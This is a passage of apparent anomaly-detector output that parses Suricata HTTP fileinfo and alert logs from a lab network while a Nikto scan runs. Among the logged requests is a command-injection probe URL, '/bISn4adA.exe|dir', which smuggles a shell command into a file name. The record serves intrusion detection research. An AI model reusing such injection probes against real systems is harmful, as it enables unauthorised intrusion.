"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46920,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.exe|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.exe|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46920,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.exe|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.exe|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.exe|dir\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.exe|dir\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.exe|dir", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.exe|dir", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46920,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46920, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1783528103273160,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1783528103273160, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.321278+0000\",\"flow_id\":1783528103273160,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46920,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.exe|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.exe|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.32 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.324976 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46922 -> 192.168.10.154:80", "/parser/model/time": 1583349514.324976, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46922, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.324976 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46922 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.32 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.325456+0000\",\"flow_id\":1513189976763438,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46922,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.325456, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1513189976763438,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46922,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46922,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46922,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46922, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1513189976763438,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1513189976763438, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.325456+0000\",\"flow_id\":1513189976763438,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46922,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.327360 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46924 -> 192.168.10.154:80", "/parser/model/time": 1583349514.32736, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46924, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.327360 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46924 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.pdf", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.327560+0000\",\"flow_id\":15431801437120,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46924,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pdf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pdf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.32756, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":15431801437120,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46924,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pdf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pdf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46924,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pdf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pdf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.pdf\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.pdf\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.pdf", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.pdf", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46924,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46924, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":15431801437120,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 15431801437120, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.327560+0000\",\"flow_id\":15431801437120,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46924,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pdf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pdf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.328985 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46926 -> 192.168.10.154:80", "/parser/model/time": 1583349514.328985, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46926, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.328985 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46926 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ 